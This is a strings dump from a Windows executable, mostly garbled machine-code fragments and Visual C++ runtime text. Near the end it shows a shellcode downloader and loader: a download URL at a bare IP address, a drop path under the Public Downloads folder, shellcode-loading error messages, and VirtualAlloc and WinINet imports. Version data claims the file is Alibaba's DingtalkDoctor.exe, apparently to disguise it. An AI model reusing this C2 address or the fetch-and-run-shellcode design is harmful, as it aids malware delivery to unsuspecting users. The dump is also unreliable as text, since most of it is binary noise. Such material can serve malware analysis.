!This program cannot be run in DOS mode.
`.rdata
@.data
.pdata
@.reloc
B.rsrc
l$0rHH
|$ ATH
SVWATAUH
@A]A\_^[
@VWATAUAVH
@A^A]A\_^
SVWATH
hA\_^[
L9L$(L
tcH91u^
L9m'sE
UVWATAUH
A]A\_^]
W L9"u
L$0H9_
L$0H9{
l$ VWATH
fffffff
fffffff
WATAUH
fD9.u"
0A]A\_
t$ WATAUAVAWH
A_A^A]A\_
t$ WATAUAVAWH
A_A^A]A\_
p WATAUH
A]A\_
WATAUH
A]A\_
@USVWATAUAVAWH
A_A^A]A\_^[]
ATAUAVH
A^A]A\
ATAUAWH
0A_A]A\
WATAUH
A]A\_
SVWATAUAVAWH
0A_A^A]A\_^[
WATAUAVAWH
A_A^A]A\_
@SVWATAUAVAWH
L!l$HL!l$@
D$PL9oXt
D$8HcH
A_A^A]A\_^[
ATAUAVH
0A^A]A\
VWATAUAVH
A^A]A\_^
UVWATAUAVAWH
`A_A^A]A\_^]
UVWATAUAVAWH
E9,$~T3
A_A^A]A\_^]
WATAVH
@A^A\_
@UATAUAVAWH
!t$(H!t$ A
A_A^A]A\]
s WATAUAVAWH
~/8\$vt)H
9t$P~98\$vt3H
A_A^A]A\_
L$ SUVWH
WATAUAVAWH
0A_A^A]A\_
@SUVWATAUAVAWH
?CuND8g
A_A^A]A\_^][
\$ UVWATAUAVAWH
A_A^A]A\_^]
H9L$Xt'H
@SUVWATAUAVH
A^A]A\_^][
!t$(H!t$ H
|$ ATAUAVH
0A^A]A\
WATAUAVAWH
A_A^A]A\_
t$ WATAUAVAWH
0A_A^A]A\_
\$ UVWATAUAVAWH
!|$DHc
|$DD9d$X
f;D$@ug
f;D$@uD
H!\$ H
HcD$HH;
H!\$ H
HcD$HH;
H!|$ L
A_A^A]A\_^]
VWATAUAVH
A^A]A\_^
WATAUAVAWH
@A_A^A]A\_
t$ WATAUH
fD9#tSH
CfD9#u
fD91u:A
Hct$PH
shHcD$XH
tLf9 t
ATAUAVH
fD9t$b
A^A]A\
@SUVWATAUAVH
zux!l$ E3
A^A]A\_^][
t$ WATAUAVAW
A_A^A]A\_
VWATAUAVH
A^A]A\_^
UVWATAUH
D$&8\$&t-8X
@A]A\_^]
@UATAUAVAWH
A_A^A]A\]
UATAUH
@A]A\]
WATAUAVAWH
A_A^A]A\_
UATAUAVAWH
A_A^A]A\]
x ATAUAVH
A^A]A\
7;|$0t,
WATAUAVAWH
0A_A^A]A\_
LcA<E3
UVWATAUAVAWH
A_A^A]A\_^]
\$ E9c
D8d$8t
D8"u%H
ATAUAVH
@A^A]A\
@SUVWATAUAVH
PA^A]A\_^][
@UATAUAVAWH
A_A^A]A\]
USVWATAUAVAWH
XA_A^A]A\_^[]
WATAUAVAWH
A_A^A]A\_
x ATAUAWH
A_A]A\
|$ UATAUAVAWH
A_A^A]A\]
H(H9J(u
generic
iostream
system
iostream stream error
bad locale name
bad cast
Unknown exception
bad allocation
Visual C++ CRT: Not enough memory to complete call to strerror.
bad exception
!"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
LC_TIME
LC_NUMERIC
LC_MONETARY
LC_CTYPE
LC_COLLATE
LC_ALL
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
CorExitProcess
Illegal byte sequence
Directory not empty
Function not implemented
No locks available
Filename too long
Resource deadlock avoided
Result too large
Domain error
Broken pipe
Too many links
Read-only file system
Invalid seek
No space left on device
File too large
Inappropriate I/O control operation
Too many open files
Too many open files in system
Invalid argument
Is a directory
Not a directory
No such device
Improper link
File exists
Resource device
Unknown error
Bad address
Permission denied
Not enough space
Resource temporarily unavailable
No child processes
Bad file descriptor
Exec format error
Arg list too long
No such device or address
Input/output error
Interrupted function call
No such process
No such file or directory
Operation not permitted
No error
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
united-states
united-kingdom
trinidad & tobago
south-korea
south-africa
south korea
south africa
slovak
puerto-rico
pr-china
pr china
new-zealand
hong-kong
holland
great britain
england
britain
america
swedish-finland
spanish-venezuela
spanish-uruguay
spanish-puerto rico
spanish-peru
spanish-paraguay
spanish-panama
spanish-nicaragua
spanish-modern
spanish-mexican
spanish-honduras
spanish-guatemala
spanish-el salvador
spanish-ecuador
spanish-dominican republic
spanish-costa rica
spanish-colombia
spanish-chile
spanish-bolivia
spanish-argentina
portuguese-brazilian
norwegian-nynorsk
norwegian-bokmal
norwegian
italian-swiss
irish-english
german-swiss
german-luxembourg
german-lichtenstein
german-austrian
french-swiss
french-luxembourg
french-canadian
french-belgian
english-usa
english-us
english-uk
english-trinidad y tobago
english-south africa
english-nz
english-jamaica
english-ire
english-caribbean
english-can
english-belize
english-aus
english-american
dutch-belgian
chinese-traditional
chinese-singapore
chinese-simplified
chinese-hongkong
chinese
canadian
belgian
australian
american-english
american english
american
Norwegian-Nynorsk
Complete Object Locator'
Class Hierarchy Descriptor'
Base Class Array'
Base Class Descriptor at (
Type Descriptor'
`local static thread guard'
`managed vector copy constructor iterator'
`vector vbase copy constructor iterator'
`vector copy constructor iterator'
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector vbase copy constructor iterator'
`eh vector copy constructor iterator'
`managed vector destructor iterator'
`managed vector constructor iterator'
`placement delete[] closure'
`placement delete closure'
`omni callsig'
delete[]
new[]
`local vftable constructor closure'
`local vftable'
`udt returning'
`copy constructor closure'
`eh vector vbase constructor iterator'
`eh vector destructor iterator'
`eh vector constructor iterator'
`virtual displacement map'
`vector vbase constructor iterator'
`vector destructor iterator'
`vector constructor iterator'
`scalar deleting destructor'
`default constructor closure'
`vector deleting destructor'
`vbase destructor'
`string'
`local static guard'
`typeof'
`vcall'
`vbtable'
`vftable'
operator
delete
__unaligned
__restrict
__ptr64
__eabi
__clrcall
__fastcall
__thiscall
__stdcall
__pascal
__cdecl
__based(
GetProcessWindowStation
GetUserObjectInformationW
GetLastActivePopup
GetActiveWindow
MessageBoxW
ios_base::badbit set
ios_base::failbit set
ios_base::eofbit set
RookIE/1.0
http://8.134.180.138/123.conf
C:\Users\Public\Downloads\1.conf
Failed to open shellcode file
Failed to get file size
Failed to allocate memory for shellcode
Failed to read shellcode from file
invalid string position
string too long
CreateFileA
GetFileSize
VirtualFree
ReadFile
VirtualAlloc
CloseHandle
DeleteFileA
KERNEL32.dll
InternetOpenUrlA
InternetReadFile
InternetOpenA
InternetCloseHandle
WININET.dll
EncodePointer
DecodePointer
InitializeCriticalSection
DeleteCriticalSection
EnterCriticalSection
LeaveCriticalSection
GetCommandLineW
GetStartupInfoW
RaiseException
RtlPcToFileHeader
RtlLookupFunctionEntry
RtlUnwindEx
GetLastError
HeapFree
WideCharToMultiByte
LCMapStringW
MultiByteToWideChar
GetCPInfo
HeapAlloc
InitializeCriticalSectionAndSpinCount
UnhandledExceptionFilter
SetUnhandledExceptionFilter
IsDebuggerPresent
RtlVirtualUnwind
RtlCaptureContext
TerminateProcess
GetCurrentProcess
WriteFile
GetConsoleCP
GetConsoleMode
GetProcAddress
GetModuleHandleW
ExitProcess
GetStdHandle
GetModuleFileNameW
FreeEnvironmentStringsW
GetEnvironmentStringsW
SetHandleCount
GetFileType
FlsGetValue
FlsSetValue
FlsFree
SetLastError
GetCurrentThreadId
FlsAlloc
HeapSetInformation
GetVersion
HeapCreate
QueryPerformanceCounter
GetTickCount
GetCurrentProcessId
GetSystemTimeAsFileTime
GetLocaleInfoW
HeapSize
FlushFileBuffers
SetFilePointer
GetACP
GetOEMCP
IsValidCodePage
GetStringTypeW
HeapReAlloc
GetUserDefaultLCID
GetLocaleInfoA
EnumSystemLocalesA
IsValidLocale
CreateFileW
WriteConsoleW
SetStdHandle
LoadLibraryW
SetEndOfFile
GetProcessHeap
.?AVerror_category@std@@
.?AV_Generic_error_category@std@@
.?AV_Iostream_error_category@std@@
.?AV_System_error_category@std@@
.?AVfacet@locale@std@@
.?AUctype_base@std@@
.?AVios_base@std@@
.?AV?$_Iosb@H@std@@
.?AV?$basic_ostream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_ios@DU?$char_traits@D@std@@@std@@
.?AV?$ctype@D@std@@
.?AV?$basic_streambuf@DU?$char_traits@D@std@@@std@@
.?AVbad_cast@std@@
.?AV?$basic_filebuf@DU?$char_traits@D@std@@@std@@
.?AVcodecvt_base@std@@
.?AV?$codecvt@DDH@std@@
.?AVlogic_error@std@@
.?AVlength_error@std@@
.?AVout_of_range@std@@
.?AV_Locimp@locale@std@@
Copyright (c) 1992-2004 by P.J. Plauger, licensed by Dinkumware, Ltd. ALL RIGHTS RESERVED.
.?AVtype_info@@
.?AVbad_exception@std@@
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AVruntime_error@std@@
.?AVexception@std@@
.?AVfailure@ios_base@std@@
.?AVsystem_error@std@@
.?AVbad_alloc@std@@
^@4S<?(
@>K=AW
H0mYg'6J
pP/Xx:
aL/Xx&L
XeXuy}]T
ypT?Xr6|n
Y0T|BP
miXWg.v
K@4X5%S
~U}a\a
d<MA$u
~U{t#$
5~/ us
((((( H
h(((( H
H
UTF-16LE
UNICODE
mscoree.dll
runtime error
TLOSS error
SING error
DOMAIN error
- Attempt to use MSIL code from this assembly during native code initialization
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
- not enough space for locale information
- Attempt to initialize the CRT more than once.
This indicates a bug in your application.
- CRT not initialized
- unable to initialize heap
- not enough space for lowio initialization
- not enough space for stdio initialization
- pure virtual function call
- not enough space for _onexit/atexit table
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
- not enough space for thread data
- abort() has been called
- not enough space for environment
- not enough space for arguments
- floating point support not loaded
Microsoft Visual C++ Runtime Library
<program name unknown>
Runtime Error!
Program:
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
USER32.DLL
CONOUT$
C:\Users\Public\Downloads\1.conf
VS_VERSION_INFO
StringFileInfo
000904b0
CompanyName
Alibaba Group.
FileDescription
DingtalkDoctor
FileVersion
1.0.0.0
InternalName
DingtalkDoctor.exe
LegalCopyright
DingTalk Copyright@2017. Alibaba Group All rights reserved.
OriginalFilename
DingtalkDoctor.exe
ProductName
DingtalkDoctor
ProductVersion
1.0.0.0
080404b0
CompanyName
FileDescription
FileVersion
1.0.0.0
InternalName
DingtalkDoctor.exe
LegalCopyright
Copyright@2017.
All rights reserved.
OriginalFilename
DingtalkDoctor.exe
ProductName
ProductVersion
1.0.0.0
VarFileInfo
Translation